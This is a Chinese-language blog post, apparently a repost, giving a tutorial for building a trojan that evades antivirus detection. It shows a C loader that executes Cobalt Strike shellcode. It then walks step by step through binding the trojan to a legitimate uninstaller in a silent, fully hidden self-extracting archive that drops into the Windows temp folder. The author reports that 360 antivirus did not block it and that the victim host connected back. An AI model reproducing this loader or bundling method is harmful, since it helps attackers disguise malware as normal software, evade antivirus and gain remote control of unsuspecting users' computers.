exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路[通俗易懂]

大家好，又见面了，我是你们的朋友全栈君。

这里演示的方式为shellcode框架加载自解压

1.生成shellcode

2.c加载(随便拉的加载器)#include

#include

#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)

unsigned char shellcode[] =

“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b”

“\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0”

“\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57”;

void main()

{

((void(*)(void))&shellcode)();

}

3.自解压捆绑exe

当目标运行正常exe的同时会运行我们的木马

复现

使用cobaltstrike生成c的shellcode

将生成的shellcode利用我们自己的加载器加载

使用vc6++打开

编译组建 生成exe

生成的exe文件位于桌面debug文件目录下

接下来使用自解压捆绑exe文件

假设这里捆绑的软件为geek(卸载程序的一个软件)选择我们的木马和要捆绑的软件 选择添加到压缩文件

选择创建自解压格式压缩文件

高级 选择自解压选项

解压路径设置为c盘windows下的temp文件

解压后运行设置选择启动我们的exe和捆绑的软件

模式选择全部隐藏

更新选择解压并更新文件和覆盖所有文件

点击确认生成捆绑马

点击确认 生成捆绑马

这里环境有360 实验360并未作出拦截

双击运行看是否上线

软件正常打开 并且主机成功上线

这个加载器的免杀效果一般 大佬们可以自行替换

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/171433.html原文链接：https://javaforall.cn